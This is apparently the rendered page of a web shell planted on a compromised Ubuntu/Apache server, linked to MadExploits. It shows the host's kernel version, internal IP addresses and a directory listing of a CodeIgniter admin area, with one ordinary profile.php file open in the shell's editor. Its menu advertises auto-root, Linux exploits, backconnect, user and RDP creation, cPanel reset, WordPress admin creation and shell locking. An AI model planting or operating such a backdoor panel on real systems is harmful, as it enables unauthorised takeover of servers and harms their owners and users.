Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
views /
admin /
common /
[ HOME SHELL ]
Name
Size
Permission
Action
common-list.php
1.44
KB
-rwxr-x--x
forget-password.php
6.07
KB
-rwxr-x--x
login.php
6.19
KB
-rwxr-x--x
page-header.php
524
B
-rwxr-x--x
profile-content.php
18.09
KB
-rwxr-x--x
profile.php
6.21
KB
-rwxr-x--x
sidebar-left.php
3.83
KB
-rwxr-x--x
sidebar-right.php
546
B
-rwxr-x--x
topbar.php
1.85
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : profile.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); ?> <!doctype html> <html class="fixed"> <head> <!-- Basic --> <meta charset="UTF-8"> <title><?=$this->lang->line('SITE_TITLE');?> | <?=$PAGE_TITLE;?> | <?=$PAGE_HEAD;?></title> <meta name="keywords" content="<?=$this->lang->line('SITE_KEYWORDS');?>" /> <meta name="description" content="<?=$this->lang->line('SITE_DESC');?>"> <meta name="author" content="<?=$this->lang->line('TECH_PARTNER');?>"> <!-- Mobile Metas --> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <!-- Web Fonts --> <link href="http://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700,800|Shadows+Into+Light" rel="stylesheet" type="text/css"> <!-- Vendor CSS --> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>bootstrap/css/bootstrap.css" /> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>font-awesome/css/font-awesome.css" /> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>magnific-popup/magnific-popup.css" /> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>bootstrap-datepicker/css/datepicker3.css" /> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>pnotify/pnotify.custom.css" /> <!-- Specific Page Vendor CSS --> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>bootstrap-fileupload/bootstrap-fileupload.min.css" /> <!-- Theme CSS --> <link rel="stylesheet" href="<?=$this->config->item('css_url');?>theme.css" /> <!-- Skin CSS --> <link rel="stylesheet" href="<?=$this->config->item('css_url');?>skins/default.css" /> <!-- Theme Custom CSS --> <link rel="stylesheet" href="<?=$this->config->item('css_url');?>theme-custom.css"> <!-- Head Libs --> <script src="<?=$this->config->item('vendor_url');?>modernizr/modernizr.js"></script> </head> <body> <section class="body"> <!-- start: header --> <header class="header"> <?php $this->load->view($DIR['TOP']); ?> </header> <!-- end: header --> <div class="inner-wrapper"> <!-- start: sidebar --> <aside id="sidebar-left" class="sidebar-left"> <?php $this->load->view($DIR['LEFT']); ?> </aside> <!-- end: sidebar --> <section role="main" class="content-body"> <header class="page-header"><?php $this->load->view($DIR['HEAD']);?></header> <!-- start: page --> <?php $this->load->view(DR_ACOMN.'/profile-content'); ?> <!-- end: page --> </section> </div> <aside id="sidebar-right" class="sidebar-right"> <?php $this->load->view($DIR['RGHT']); ?> </aside> </section> <!-- Vendor --> <script src="<?=$this->config->item('vendor_url');?>jquery/jquery.js"></script> <script src="<?=$this->config->item('vendor_url');?>jquery-browser-mobile/jquery.browser.mobile.js"></script> <script src="<?=$this->config->item('vendor_url');?>bootstrap/js/bootstrap.js"></script> <script src="<?=$this->config->item('vendor_url');?>nanoscroller/nanoscroller.js"></script> <script src="<?=$this->config->item('vendor_url');?>bootstrap-datepicker/js/bootstrap-datepicker.js"></script> <!-- Specific Page Vendor --> <script src="<?=$this->config->item('vendor_url');?>pnotify/pnotify.custom.js"></script> <!-- Specific Page Vendor --> <script src="<?=$this->config->item('vendor_url');?>jquery-autosize/jquery.autosize.js"></script> <script src="<?=$this->config->item('vendor_url');?>bootstrap-fileupload/bootstrap-fileupload.min.js"></script> <!-- Theme Base, Components and Settings --> <script src="<?=$this->config->item('jvs_url');?>theme.js"></script> <!-- Theme Custom --> <script src="<?=$this->config->item('jvs_url');?>theme.custom.js"></script> <!-- Theme Initialization Files --> <script src="<?=$this->config->item('jvs_url');?>theme.init.js"></script> <script src="<?=$this->config->item('js_url');?>common.js"></script> <?php if($PRSNT_BLK ==BLK_LIST) { ?> <script src="<?=$this->config->item('vendor_url');?>jquery-validation/jquery.validate.js"></script> <script> $().ready(function() { // validate signup form on keyup and submit $("#signupForm").validate({ rules: { NewPass: { required: true, minlength: <?=PWD_MIN_LNGTH;?>, maxlength: <?=PWD_MAX_LNGTH;?> }, ConPass: { required: true, minlength: <?=PWD_MIN_LNGTH;?>, maxlength: <?=PWD_MAX_LNGTH;?>, equalTo: "#NewPass" } }, messages: { NewPass: { required: "<?=$this->lang->line('GL_PWD_MSG');?>", minlength: "<?=$this->lang->line('GL_PWD_MIN_MSG');?>", maxlength: "<?=$this->lang->line('GL_PWD_MAX_MSG');?>" }, ConPass: { required: "<?=$this->lang->line('GL_PWD_MSG');?>", minlength: "<?=$this->lang->line('GL_PWD_MIN_MSG');?>", maxlength: "<?=$this->lang->line('GL_PWD_MAX_MSG');?>", equalTo: "<?=$this->lang->line('GL_CON_PWD_MSG');?>" } } }); }); </script> <?php } ?> <?php if($this->session->flashdata(STATUS_MSG) != '') { ?> <script> (function( $ ) { 'use strict'; var stack_bottomright = {"dir1": "up", "dir2": "left", "firstpos1": 15, "firstpos2": 15}; var notice = new PNotify({ title: '<?=$PAGE_TITLE;?>', text: '<?=$this->session->flashdata(STATUS_MSG);?>', type: '<?=$this->session->flashdata(STATUS_TYPE);?>', addclass: 'stack-bottomright', stack: {"dir1": "up", "dir2": "left", "firstpos1": 15, "firstpos2": 15} }); }).apply( this, [ jQuery ]); </script> <?php $this->session->unset_userdata(STATUS_MSG); } ?> </body> </html>
Close